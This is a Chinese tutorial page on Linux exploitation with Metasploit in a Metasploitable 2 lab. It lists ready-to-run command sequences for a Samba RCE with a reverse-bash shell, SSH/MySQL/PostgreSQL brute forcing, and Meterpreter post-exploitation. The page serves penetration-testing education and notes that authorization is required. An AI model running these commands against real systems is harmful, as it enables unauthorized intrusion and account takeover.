您的位置:首页 >如何使用Metasploit进行Linux漏洞利用
发布于2026-05-02 阅读(0)
扫一扫,手机访问
开门见山,这份指南旨在提供一个清晰、可复现的 Linux 环境漏洞利用实操路径。不过,在动手之前,有些原则必须摆在最前面。
一切测试的起点,都是一个安全、隔离的实验环境。通常,我们会借助虚拟化平台(比如 VirtualBox 或 VMware)来搭建一个微型网络。在这个网络里,至少需要两台机器:一台作为“靶机”,推荐使用预置了多种漏洞的 Metasploitable 2;另一台作为“攻击机”,功能强大的 Kali Linux 是不二之选。Metasploitable 2 集成了从 Samba 到 SSH 的多种经典漏洞,是练习 Metasploit 标准流程的绝佳沙盒。
在 Kali 上,确保 Metasploit 框架是最新的:执行 sudo apt update && sudo apt install metasploit-framework。安装完成后,在终端输入 msfconsole,那个熟悉的控制台界面就会启动,我们的工作即将从这里开始。
需要警惕的是:所有技术操作都必须在法律授权的范围内进行。对未授权系统的任何测试行为都可能构成违法。务必确保你拥有明确的书面授权,严格控制测试的范围和可能产生的影响,并且全程做好记录,以备报告之需。
标准的漏洞利用过程,其实是一个逻辑严密的“四步舞”。掌握这个节奏,大部分场景都能应对。
nmap -sV <目标IP>。当然,Metasploit 本身也提供了丰富的辅助扫描模块,例如 auxiliary/scanner/portscan/tcp,可以在控制台内完成初步探测。search 命令查找相关漏洞模块。找到后,用 use <模块路径> 载入它。接着,show options 会列出需要设置的参数,其中 RHOSTS(目标IP)和 RPORT(目标端口)通常是必填项。cmd/unix/reverse_bash,需要设置攻击机的 LHOST 和 LPORT)或正向连接(如 cmd/unix/bind_netcat,通常只需设置 LPORT)。exploit 或 run 执行攻击。如果成功,会获得一个会话。使用 sessions -l 可以查看所有活跃会话,用 sessions -i 可以交互式地进入指定会话。进入后,执行 whoami、id 等命令,权限和访问就得到了验证。理论讲完了,来看几个实战中高频出现的场景。下面的表格整理了几个经典的 Linux 服务漏洞及其在 Metasploit 中的利用方法,你可以把它当作一份速查手册。
| 场景与服务 | 模块路径 | 关键设置 | 典型命令 |
|---|---|---|---|
| Samba “username map script” RCE | exploit/multi/samba/usermap_script | 设置 RHOSTS(目标IP),端口通常为 139/445;可选正向/反向载荷 | use exploit/multi/samba/usermap_script; set RHOSTS 192.168.1.102; set payload cmd/unix/reverse_bash; set LHOST <攻击机IP>; run |
| SSH 弱口令/字典爆破 | auxiliary/scanner/ssh/ssh_login | 设置 RHOSTS、RPORT、USER_FILE、PASS_FILE | use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.100; set USER_FILE users.txt; set PASS_FILE rockyou.txt; run |
| MySQL 登录爆破 | auxiliary/scanner/mysql/mysql_login | 设置 RHOSTS、USER_FILE、PASS_FILE | use auxiliary/scanner/mysql/mysql_login; set RHOSTS 192.168.1.111; set user_file users.txt; set pass_file passwords.txt; run |
| PostgreSQL 登录爆破 | auxiliary/scanner/postgres/postgres_login | 设置 RHOSTS、USER_FILE、PASS_FILE | use auxiliary/scanner/postgres/postgres_login; set RHOSTS 192.168.1.111; set user_file users.txt; set pass_file passwords.txt; run |
| 其他经典 Linux 服务漏洞 | 视服务而定(如 distcc、UnrealIRCd 等) | 依据模块说明设置 RHOSTS 与载荷 | 示例:use exploit/unix/misc/distcc_exec; set RHOSTS |
以上示例覆盖了常见的 Linux 服务弱点与 Metasploit 对应模块,参数名与用法以模块帮助为准。
拿到初始访问权限,故事才刚刚开始。后续的“后渗透”动作,往往决定了测试的深度和价值。
background 命令将当前会话放到后台运行,方便同时管理多个连接。通过 sessions -i 可以随时切换回去。如果拿到的是普通 shell,可以尝试用 sessions -u 将其升级为功能更强大的 Meterpreter 会话。ps 查看进程,kill 结束进程,upload/download 传输文件,execute 执行命令,shell 获取系统 Shell。在此基础上,可以进行横向移动和更深入的信息收集。实操过程中难免遇到问题,而从防御视角理解攻击,才能更好地构建防护。
RHOSTS/RPORT 设置和网络策略。载荷连接不上?在 NAT 或云环境中,优先使用反向连接并确保 LHOST 设置正确可达。爆破不成功?可能是字典不够全,尝试更换或扩充字典。模块执行不成功?可能是目标版本不兼容,考虑更换模块或升级 Metasploit 框架本身。下一篇:SFTP配置中的常见问题有哪些
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
售后无忧
立即购买>office旗舰店
正版软件
正版软件
正版软件
正版软件
正版软件
1
2
3
7
9